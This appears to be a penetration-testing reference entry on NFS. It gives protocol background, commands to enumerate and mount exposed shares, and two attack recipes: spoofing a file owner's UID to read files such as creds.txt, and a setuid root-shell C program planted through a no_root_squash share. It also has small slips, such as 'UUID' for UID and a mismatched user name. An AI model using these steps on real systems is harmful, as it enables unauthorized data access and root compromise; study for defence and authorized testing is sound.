NFS (111-2049)

Network File System.

Protocol Information

NFS is a distributed file system protocol. It allows a user on a client computer to access files on a computer network as if they were on a locally mounted storage device (same purpose as SMB). NFS is often used with UNIX operating systems and is mostly insecure in its implementation. It can be somewhat difficult to configure securely, so it is not uncommon to find NFS shares open to the world.

There are 3 versions: - NFSv2: It is an older protocol, but it is supported by many systems and initially worked entirely via UDP. - NFSv3: It has more features, including variable file sizes and better error reporting, but is not fully compatible with NFSv2 clients. - NFSv4:It includes Kerberos, works through firewalls and over the Internet, no longer requires portmappers, supports ACLs, applies state-based operations, and provides performance improvements and high security. It is also the first version to have a stateful protocol.

Port

111 TCP/UDP	NFS (rpcbind)
2049 TCP	NFS

Config File

• /etc/exports (LINK)

Interact

Search open directories.

showmount -e <IP>

Mounts an open directory that has been found.

mkdir <myDIR>
sudo mount -t nfs -o nolock <IP>:/<FOUND_DIR> ./<myDIR>

Once finished, unmount the directory.

sudo umount <myDIR>

Attacks

Read File

You can read files without having permission by changing the UUID.

ls -n
# drwxr-xr-x 1 1014 1014  48 Jun 10  creds.txt

sudo adduser <NAME>
sudo vim /etc/passwd # change the UUID of <NAME> to 1014                      
# or
sudo sed -i -e 's/<UUID_NAME>/1014/g' /etc/passwd

su pwn
id && cat creds.txt

Shell with SUID binary

In /etc/exports there is an option that if not set correctly can lead to this attack.

• root_squash: If the root user is used to access NFS shares, it will be changed to the user nfsnobody, which is an account with no privileges. All files created and uploaded by the root user will be owned by the nfsnobody user, which prevents an attacker from uploading binary files with the SUID bit set.

• no_root_squash: Remote users connecting to the share as the local root user will be able to create files on the NFS server as the root user. This would allow the creation of malicious scripts/programs with the SUID bit set.

So the idea is to create with the ROOT user a binary that invokes a shell with SUID and load it on the victim host and then run it from the victim host.

1. Create the binary that invokes the shell.

Shell.c

#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdlib.h>

int main(void)
{
  setuid(0); setgid(0); system("/bin/bash");
}

gcc shell.c -o shell

1. Move the binary to the directory and set the SUID.

cp shell <myDIR>
chmod u+s <myDIR>/shell

1. Move to the victim host and run the binary.

./shell